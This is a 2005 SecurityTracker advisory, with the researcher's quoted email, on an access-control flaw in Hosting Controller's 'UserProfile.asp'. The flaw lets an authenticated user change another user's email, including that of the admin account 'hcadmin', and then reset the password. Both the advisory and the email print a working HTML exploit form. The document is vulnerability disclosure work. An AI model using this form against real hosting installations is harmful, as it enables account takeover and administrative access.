SecurityTracker.com
Keep Track of the Latest Vulnerabilities
with SecurityTracker!
    Home    |    View Topics    |    Search    |    Contact Us    |    Help    |   

SecurityTracker
Archives


Welcome to SecurityTracker!
 
Click to Sign Up
Sign Up
Sign Up for Your FREE Weekly SecurityTracker E-mail Alert Summary
Instant Alerts
Buy our Premium Vulnerability Notification Service to receive customized, instant alerts
Affiliates
Put SecurityTracker Vulnerability Alerts on Your Web Site -- It's Free!
Partners
Become a Partner and License Our Database or Notification Service
Report a Bug
Report a vulnerability that you have found to SecurityTracker
bugs
@
securitytracker.com

Sign Up!





Category:  Application (Generic)  >  Hosting Controller Vendors:  HostingController.com
Hosting Controller 'UserProfile.asp' Lets Remote Authenticated Users Modify Other User Profiles
SecurityTracker Alert ID:  1014062
SecurityTracker URL:  http://securitytracker.com/id?1014062
CVE Reference:  GENERIC-MAP-NOMATCH   (Links to External Site)
Date:  May 27 2005
Impact:  Modification of user information, User access via network
Exploit Included:  Yes  
Version(s): 6.1 HotFix 2.0 and prior versions
Description:  Soroush Dalili from GrayHatz Security Group reported a vulnerability in Hosting Controller. A remote authenticated user can change a target user's profile.

The 'UserProfile.asp' script does not properly enforce access controls. A remote authenticated user can change a target user's e-mail address. Then, the remote authenticated user can invoke the 'forgot password' feature to request that a new password be sent to the modified e-mail address. This can be exploited to gain administrative privileges.

A demonstration exploit form is provided:

<form
action="http://[URL]/admin// accounts/UserProfile.asp?action=updateprofile"
method="post">
Username : <input name="UserList" value="hcadmin"
type="text" size="50">
<br>
emailaddress : <input name="emailaddress"
value="Crkchat@msn.com" type="text" size="50">
<br>
firstname : <input name="firstname" value="Crkchat"
type="text" size="50">
<br>
<input name="submit" value="submit" type="submit">
</form>

Impact:  A remote authenticated user can change a target user's profile and then gain access to the target user's account.
Solution:  No solution was available at the time of this entry.
Vendor URL:  www.hostingcontroller.com/ (Links to External Site)
Cause:  Access control error
Underlying OS:  Windows (NT), Windows (2000), Windows (XP)
Reported By:  s d <irsdl@yahoo.com>
Message History:   None.


 Source Message Contents

Date:  Thu, 26 May 2005 17:59:36 -0700 (PDT)
From:  s d <irsdl@yahoo.com>
Subject:  By using "UserProfile.asp" at Hosting Controller: An authenticated user can change other's profiles

 
 
Hi, I'm Soroush Dalili from GSG (GrayHatz Security
Group).
 
Title: Hosting controller program have a security bug
in "UserProfile.asp" that an authenticated user can
change other's profiles.
Why is it dangerous: a user can change other's email
address and then use forgot password to recieve their
password! also he/she can gain administrator password
by this way!
Version: 6.1 HotFix 2.0 and older
Developer url: hostingcontroller.com
Comment: Hosting Controller is an application to
manage a host.
 
Exploit code to proof:
--------------------------------
Change users profiles:
<form
action="http://[URL]/admin//accounts/UserProfile.asp?action=updateprofile"
method="post">
Username : <input name="UserList" value="hcadmin"
type="text" size="50">
<br>
emailaddress : <input name="emailaddress"
value="Crkchat@msn.com" type="text" size="50">
<br>
firstname : <input name="firstname" value="Crkchat"
type="text" size="50">
<br>
<input name="submit" value="submit" type="submit">
</form>
-----------------------------------
Now u can use forgot password to gain passwords!
-----------------------------------
 
Finder name: Soroush Dalili
Email: Irsdl@yahoo.com
Team: GSG (GrayHatz Security Group)
Country: Iran
Thanks from Crkchat
 
 
		
__________________________________ 
Do you Yahoo!? 
Yahoo! Small Business - Try our new Resources site
http://smallbusiness.yahoo.com/resources/
 


Go to the Top of This SecurityTracker Archive Page





Home   |    View Topics   |    Search   |    Contact Us   |    Help

Copyright 2005, SecurityGlobal.net LLC